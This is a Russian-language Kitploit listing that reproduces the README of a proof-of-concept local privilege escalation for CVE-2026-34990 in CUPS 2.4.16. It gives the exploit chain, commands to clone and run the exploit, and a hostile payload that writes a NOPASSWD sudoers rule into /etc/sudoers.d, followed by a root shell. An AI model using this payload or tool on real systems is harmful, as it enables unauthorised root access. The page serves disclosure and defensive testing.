Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-34990-CUPS-LPE-PoC — Универсальный PoC для CVE-2026-34990 — локальное повышение привилегий в CUPS 2.4.16 через раскрытие локального токена и произвольную перезапись файлов от имени root. | Kitploit
Инструменты/GitHubGitHub/noorkhalel/cve-2026-34990-cups-lpe-poc
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на Проникновение
GitHubnoorkhalel/cve-2026-34990-cups-lpe-poc

CVE-2026-34990-CUPS-LPE-PoC

Универсальный PoC для CVE-2026-34990 — локальное повышение привилегий в CUPS 2.4.16 через раскрытие локального токена и произвольную перезапись файлов от имени root.

Репозиторий

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
22 дней назадЕщё не проверено

CVE-2026-34990 | PoC локального повышения привилегий в CUPS

Универсальный proof-of-concept для CVE-2026-34990 — уязвимости локального повышения привилегий, затрагивающей CUPS 2.4.16.

Эксплойт демонстрирует, как локальный непривилегированный пользователь может злоупотребить локальной аутентификацией CUPS и поведением при настройке принтера, чтобы получить произвольную запись в файл от имени root и повысить привилегии.

Уязвимость

  • CVE: CVE-2026-34990
  • Компонент: CUPS
  • Протестированная версия: CUPS 2.4.16
  • Тип: Локальное повышение привилегий
  • Воздействие: Произвольная запись в файл от имени root
  • Исправленная версия: CUPS 2.4.17

Авторство уязвимости

CVE-2026-34990 была изначально обнаружена:

Asim Viladi Oglu Manizada (@manizada)

Я не являюсь первооткрывателем этой уязвимости.

Этот репозиторий содержит мою адаптированную и протестированную реализацию proof-of-concept, основанную на публично раскрытой технической информации.

Как это работает

На высоком уровне цепочка эксплойта выглядит так:

Локальный непривилегированный пользователь
        |
        v
Создание временного принтера CUPS
        |
        v
Запуск исходящей аутентификации IPP
        |
        v
Перехват Authorization: Local token
        |
        v
Повторное использование токена для привилегированных операций CUPS
        |
        v
Создание/сохранение принтера file://
        |
        v
Отправка задания на печать
        |
        v
Произвольная запись в файл от имени root
        |
        v
Повышение привилегий

PoC автоматически использует текущее имя локального пользователя.

Например, при запуске от имени:

alice

демонстрационная полезная нагрузка нацелена на:

/etc/sudoers.d/alice-pwn

и пытается записать:

alice ALL=(ALL) NOPASSWD: ALL

Успешный эксплойт затем можно проверить с помощью:

sudo -n id

Пример:

uid=0(root) gid=0(root) groups=0(root)

Требования

PoC предполагает наличие:

  • Linux
  • Python 3
  • Уязвимая установка CUPS
  • ipptool
  • lp
  • lpstat
  • Локальный доступ к планировщику CUPS

Проверьте версию CUPS:

cups-config --version

Проверьте, что планировщик запущен:

lpstat -r

Проверьте локальный слушатель CUPS:

ss -lnt | grep 631

Использование

Клонируйте репозиторий:

git clone https://github.com/Noorkhalel/CVE-2026-34990-CUPS-LPE-PoC.git
cd CVE-2026-34990-CUPS-LPE-PoC

Запустите:

python3 exploit.py

Пример вывода:

[*] user: <local-user>
[*] target: /etc/sudoers.d/<local-user>-pwn

[+] Local token: <LOCAL_TOKEN>

[*] attempt 1: <printer-name>

[+] ROOT via sudoers
uid=0(root) gid=0(root) groups=0(root)

[*] next: sudo -n bash

После успешной эксплуатации:

sudo -n bash

Область применения

Этот PoC намеренно написан как универсальная реализация публично раскрытой CVE.

Он не содержит:

  • информации, специфичной для CTF
  • информации о тренировочных платформах
  • имён машин
  • учётных данных
  • флагов
  • IP-адресов целей
  • секретов, специфичных для окружения

Отказ от ответственности

Этот код предоставляется для:

  • исследований в области безопасности
  • воспроизведения уязвимостей
  • защитного тестирования
  • образовательных целей
  • авторизованного тестирования на проникновение

Используйте этот код только на системах, которыми вы владеете, или на системах, на которые у вас есть явное разрешение.

Автор не несёт ответственности за неправомерное использование этого программного обеспечения.

Благодарности

Обнаружение уязвимости:
Asim Viladi Oglu Manizada (@manizada)

Адаптация PoC, тестирование и документация:
Noor Khalil

Ссылки

  • CVE-2026-34990
  • OpenPrinting CUPS
  • OpenPrinting Security Advisory - GHSA-c54j-2vqw-wpwp
Скачать инструмент